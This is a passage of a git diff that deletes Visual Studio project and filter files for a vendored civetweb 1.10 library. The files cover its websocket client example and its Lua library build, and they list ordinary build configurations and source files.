-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{58B93E94-7766-435E-93AE-42A2FB5D99B2}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>ex_websocket_client</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;NDEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c" />

-    <ClCompile Include="..\..\examples\websocket_client\websocket_client.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket_client/ex_websocket_client.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/ex_websocket_client/ex_websocket_client.vcxproj.filters
deleted file mode 100644
index c91ce3e..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket_client/ex_websocket_client.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\examples\websocket_client\websocket_client.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/lua_lib/lua_lib.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/lua_lib/lua_lib.vcxproj
deleted file mode 100644
index a92e92a..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/lua_lib/lua_lib.vcxproj
+++ /dev/null
@@ -1,191 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>lua_lib</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>TurnOffAllWarnings</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>LUA_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;_DEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>LUA_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;_DEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>LUA_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>LUA_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\third_party\lfs.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lapi.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lauxlib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lbaselib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lbitlib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lcode.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lcorolib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lctype.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldblib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldebug.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldo.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldump.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lfunc.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lgc.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\linit.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\liolib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\llex.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lmathlib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lmem.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\loadlib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lobject.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lopcodes.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\loslib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lparser.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lstate.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lstring.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lstrlib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ltable.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ltablib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ltm.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lundump.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lvm.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lzio.c" />

-    <ClCompile Include="..\..\src\third_party\lsqlite3.c" />

-    <ClCompile Include="..\..\src\third_party\LuaXML_lib.c" />

-    <ClCompile Include="..\..\src\third_party\sqlite3.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\third_party\lfs.h" />

-    <ClInclude Include="..\..\src\third_party\sqlite3.h" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/lua_lib/lua_lib.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/lua_lib/lua_lib.vcxproj.filters
deleted file mode 100644
index 657c5f2..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/lua_lib/lua_lib.vcxproj.filters
+++ /dev/null
@@ -1,135 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\third_party\lsqlite3.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\sqlite3.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lfs.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lapi.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lauxlib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lbaselib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lbitlib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lcode.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lcorolib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lctype.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldblib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldebug.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldo.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldump.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lfunc.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lgc.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\linit.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\liolib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\llex.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lmathlib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lmem.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\loadlib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lobject.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lopcodes.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\loslib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lparser.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lstate.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lstring.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lstrlib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ltable.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ltablib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ltm.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lundump.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lvm.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lzio.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\LuaXML_lib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\third_party\sqlite3.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\src\third_party\lfs.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-</Project>

diff --git a/thirdparty/civetweb-1.10/VisualStudio/unit_test/unit_test.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/unit_test/unit_test.vcxproj
deleted file mode 100644
index d3e02cd..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/unit_test/unit_test.vcxproj
+++ /dev/null
@@ -1,105 +0,0 @@
